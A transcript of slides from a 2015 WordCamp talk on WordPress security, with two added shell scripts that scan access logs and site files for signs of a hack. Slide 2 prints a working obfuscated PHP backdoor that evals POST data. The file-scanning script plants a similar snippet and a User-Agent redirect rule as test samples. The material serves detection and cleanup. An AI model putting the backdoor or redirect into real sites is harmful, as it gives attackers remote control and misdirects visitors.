Your WordPress Site is and is not Hacked - You don't know until you check

These are slides from WordCamp Salt Lake City, September 12, 2015. WordPress Security with AskWPGirl.

Published in: Technology

Slide transcript
1. YOUR SITE IS AND IS NOT HACKED
   @ASKWPGIRL #WCSLC

2. SCHRODINGER'S WEBSITE
   You must assume your site is both hacked and not hacked until you open the box and find out.
   (The slide shows an obfuscated PHP backdoor: the string juggling spells out _POST, so the file evals whatever arrives in a POST parameter.)
   <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>

3. Angela Bowman, Ask WP Girl, @askwpgirl
   WordPress Instructor and Custom Theme Developer
   Using WordPress since 2007 (version 2.2)
   Not a security expert, but I play one on WordPress.tv

4. WHAAA? (section 1)

5. WHY DO HACKERS HACK?
   Deface sites for fun
   Add spammy links to bad web neighborhoods (SEO spam)
   Hijack site to add spam, porn, gambling, pay-day loan content
   Steal sensitive information to sell
   Distribute malware to personal computers
   Use server resources for distributed attacks

6. WHAT DO HACKERS ACTUALLY DO?
   Create admin account
   Reset passwords
   Inject malicious code into content
   Add malicious code to existing files or new files
   Redirect your website
   http://www.wpmayor.com/wordpress-security-based-facts-statistics/ (Gravity Forms hack)

7. WHY SHOULD YOU CARE?
   Performance issues
   SEO tanks
   Blacklisting or PhishTank
   Account closed
   Angry customers

8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST
   Many hacks are hidden

9. WHY ARE WORDPRESS SITES VULNERABLE?
   41% Hosting
   29% Themes
   22% Plugins
   8% Weak passwords

10. RECENT VULNERABILITIES
    Google Analytics, WordPress 4.2.1, Backup to Dropbox, FancyBox, TwentyFifteen, Revolution Slider, Gravity Forms, JetPack
    Database of all vulnerable plugins and themes: https://wpvulndb.com/

11. LOW HANGING FRUIT
    Vulnerabilities immediately published on the web
    Hackers write bots to exploit vulnerabilities
    Website owners are oblivious: they don't update, use weak passwords, install tons of plugins, use not-great web hosting

12. COMMON EXPLOITS AND HOW TO FIX (section 2)

13. "SPOT THE HACK" GAME
    A - Scan site
    B - Look at files on server
    C - Find the hacked code

14. 1 - Backdoors
    PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.

15. "It's very common that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside." ~ Sucuri

16. 2 - Drive-by Downloads
    Script injected on website generates links to malware sites or downloads malware from your site to visitors' computers. Easy for scanners to detect.

17. 3 - Pharma Hack
    Spam links injected onto web pages, only visible to search engines. Difficult to scan for because cloaked.
    https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html

18. 4 - Malicious Redirects
    Redirects traffic from your website to another, typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone. (The slide shows a hacked .htaccess file.)

19. DIY HACK RECOVERY
    Via SFTP (preferred) or FTP
    1 Backup: download everything. Good to examine later for details of the hack if needed.
    2 Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
    3 Upload fresh: WordPress, themes, plugins, cleaned uploads

20. MONITORING TIPS
    Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
    Check raw access logs via cPanel
    db12.php, css.php, dirs35.php????
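Slide 20's question turned into a check you can run over a downloaded raw access log. This is an added example, not part of the slides; the log lines are constructed samples, and the list of PHP entry points treated as normal for a stock install is my assumption.

```shell
#!/bin/sh
# Added example (not part of the slides): triage a cPanel/Apache raw access log
# for requests to PHP files that a stock WordPress install does not serve.
# The log lines below are constructed samples in Apache combined format.

SAMPLE_LOG='203.0.113.5 - - [12/Sep/2015:10:01:02 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.77 - - [12/Sep/2015:10:02:41 -0600] "POST /wp-content/themes/twentyfifteen/css/db12.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"
198.51.100.77 - - [12/Sep/2015:10:02:43 -0600] "POST /wp-content/uploads/2015/09/dirs35.php HTTP/1.1" 200 14 "-" "-"
203.0.113.5 - - [12/Sep/2015:10:05:00 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Sep/2015:10:07:12 -0600] "GET /wp-cron.php?doing_wp_cron HTTP/1.1" 200 0 "-" "WordPress/4.3"'

# Read a log on stdin; print "hits ip path" for every PHP request whose path
# is not one of the entry points WordPress itself serves (root scripts and
# wp-admin/). Anything else, e.g. PHP under wp-content/uploads or inside a
# theme's css/ folder, deserves a look on the server.
suspicious_php_requests() {
  awk '
    {
      path = $7; sub(/[?].*/, "", path)         # field 7 = request path
      if (path !~ /\.php$/) next
      if (path ~ /^\/(index|wp-login|wp-cron|xmlrpc|wp-comments-post)\.php$/) next
      if (path ~ /^\/wp-admin\//) next
      hits[$1 " " path]++
    }
    END { for (k in hits) print hits[k], k }
  ' | sort -rn
}

# Number of distinct (ip, path) pairs flagged; handy for a cron-style alert.
suspicious_count() {
  suspicious_php_requests | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | suspicious_php_requests
```

Point it at a real log with `suspicious_php_requests < access.log`; each flagged path is a file to open over SFTP and compare against a clean copy.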
21. Audit Activity on Site
    https://wordpress.org/plugins/wp-simple-firewall/

22. Finding PHP Back Doors
    Check WordPress core integrity using the Sucuri plugin: https://wordpress.org/plugins/sucuri-scanner/
    Run https://wordpress.org/plugins/gotmls/ to check the wp-content folder
    Look for modified dates, unusual names, file types that don't belong
    Compare file list to original download
    Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
    Any file can be hacked!
    Hmmmm? PHP in a CSS folder?

23. Finding and Removing Malicious Redirects
    Listen when someone tells you that they tried to visit your site and couldn't, and find out which browser or device they were using at the time.
    Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
    Scan with Sucuri's SiteCheck: https://sitecheck.sucuri.net/
    Check all the .htaccess files on the server and remove the redirect.
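The file-side checks from slides 22 and 23 as one script to run against a downloaded copy of the site. This is an added example, not from the slides or from any plugin they mention; the site tree, file names and .htaccess contents are constructed, and which folders count as asset-only is my assumption.

```shell
#!/bin/sh
# Added example (not part of the slides): walk a WordPress tree the way slides
# 22 and 23 suggest, flagging PHP files in folders that should only hold static
# assets, PHP that calls eval() or uses variable-variables (${$x}, the trick in
# the slide 2 snippet), and .htaccess rules that redirect by User-Agent.
# Everything under the sample tree is constructed for the demo.

# Build a small constructed site tree under $1: one clean file per type plus
# one planted finding of each kind.
make_sample_tree() {
  root="$1"
  mkdir -p "$root/wp-content/themes/twentyfifteen/css" \
           "$root/wp-content/uploads/2015/09" "$root/wp-admin"
  echo '<?php echo "ok"; ?>' > "$root/index.php"
  echo 'body { margin: 0 }' > "$root/wp-content/themes/twentyfifteen/css/style.css"
  echo '<?php if(isset(${$s20}["x"])){eval(${$s20}["x"]);} ?>' \
    > "$root/wp-content/themes/twentyfifteen/css/db12.php"
  printf 'RewriteEngine On\nRewriteCond %%{HTTP_USER_AGENT} android [NC]\nRewriteRule ^ http://example.invalid/ [R,L]\n' \
    > "$root/.htaccess"
  printf 'Options -Indexes\n' > "$root/wp-content/uploads/.htaccess"
}

# 1. PHP where only static assets belong: uploads/, or any css/js/images dir.
php_in_asset_dirs() {
  find "$1/wp-content" -type f -name '*.php' \
    \( -path '*/uploads/*' -o -path '*/css/*' -o -path '*/js/*' -o -path '*/images/*' \)
}

# 2. PHP files that call eval() or dereference a variable-variable.
php_with_eval() {
  find "$1" -type f -name '*.php' -exec grep -lE 'eval[[:space:]]*\(|\$\{\$' {} +
}

# 3. .htaccess files that combine a User-Agent condition with an external
#    redirect, the shape of a device-specific malicious redirect.
htaccess_ua_redirects() {
  find "$1" -type f -name '.htaccess' -exec sh -c '
    grep -qi "RewriteCond.*HTTP_USER_AGENT" "$1" &&
    grep -qiE "RewriteRule.*https?://" "$1" && echo "$1"' _ {} \;
}

audit_wp_tree() {
  echo "== PHP in asset directories";            php_in_asset_dirs "$1"
  echo "== PHP using eval()/variable-variables"; php_with_eval "$1"
  echo "== .htaccess with User-Agent redirects"; htaccess_ua_redirects "$1"
}

SITE=$(mktemp -d) && make_sample_tree "$SITE" && audit_wp_tree "$SITE"
```

On a real site run `audit_wp_tree /path/to/downloaded/site`; every hit still needs a human to compare it with the original download before deleting anything.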
24. Use Google Search Console!
    Google Webmaster Tools/Search Console
    Search Queries - you can spot queries irrelevant to your site.
    Links to Your Site - you can find suspicious incoming links here.
    Internal Links - this report can help reveal rogue sections of your site.
    http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/

25. Check for rogue users and posts
    Your new admin friends?
    Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/

26. IMMEDIATELY CHANGE PASSWORDS
    Use the Sucuri plugin to generate new security keys
    Reset all passwords, including WordPress users, FTP, web hosting, control panel
    Scan computer for viruses!

27. CLEAN UP "BAD" HACK
    If hackers got admin access to the site or database, you might have to nuke the entire site from orbit. It's the only way to be sure. https://www.youtube.com/watch?v=aCbfMkh940Q
    See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
    Or contact sucuri.net for site clean up and monitoring

28. REQUEST SITE REVIEW
    If Google blacklisted your site or marked it for a phishing scam, you will need to request a review after you are certain you've cleaned up all hacked files:
    https://support.google.com/webmasters/answer/168328?hl=en

29. SECURITY BASICS (section 3)

30. UPDATE UPDATE UPDATE
    Timely updates are critical for security.
    Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
    http://askwpgirl.com/updating-wordpress-plugins-themes-core/

31. SECURE YOUR LOGIN
    Online generator: http://www.pctools.com/guides/password/
    Track passwords: http://agilebits.com/products/1Password
    Enable two-factor authentication: http://askwpgirl.com/wordpress-two-factor-authentication-plugins/
    Avoid logging in on public WiFi networks

32. RUN A TIGHT SHIP!
    Delete ALL unused stuff on the server
    Only use popular and well-maintained themes and plugins
    Don't allow users to register (Settings > General)
    Always hold comments for moderation and use spam filtering (Akismet plugin)

33. GOOD HOSTING
    Correct file permissions
    WordPress auto updates
    Firewall and scanning
    Regular backups
    Server security
    Performance optimization
    Managed WordPress hosts: SiteGround, WP Engine, Flywheel, WebSynthesis, Pantheon

34. EFFECTIVE SECURITY PLUGIN FEATURES
    Limit login access
    Block bad URL requests with a firewall
    Audit activity
    Security through obscurity is not security
    IP addresses don't matter and should not be used as the foundation of a WordPress security policy
    My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more. Will notify you of vulnerable plugins.

35. BACKUPS
    Common wisdom is to back up your site
    Backups are to your site what major medical health care coverage is to your health
    Usually only helpful in case of a disaster
    Services: VaultPress and WorpDrive (good hosted solutions!)
    Plugins: BackupBuddy (paid), BackWPup, Duplicator

36. SECURE YOUR COMPUTER
    Scan for viruses and trojans
    Be careful about downloading stuff!!!!

37. RESOURCES
    http://snipe.net/2010/01/when-wordpress-gets-hacked/
    https://support.google.com/webmasters/answer/163633?rd=1
    http://aw-snap.info/articles/find-backdoor.php
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://sucuri.net - free scan, hack recovery, site monitoring, great posts on how to clean up specific hacks
    http://aswkpgirl.com/nuke-it-from-orbit
    https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
    https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
    About the banking hack: https://www.proofpoint.com/es/node/327
    Top 10 web application security risks for developers: https://youtu.be/nuWR_HiBHYc
    http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/

38. CONTACT
    facebook.com/askwpgirl
    twitter.com/askwpgirl
    http://askwpgirl.com
    http://boulderdigitalarts.com
    One-on-one consulting third Friday of every month at Boulder Digital Arts
    Six-week theme customization course in Colorado and online
    SEO and Best Maintenance Tips Newsletter: http://askwpgirl.com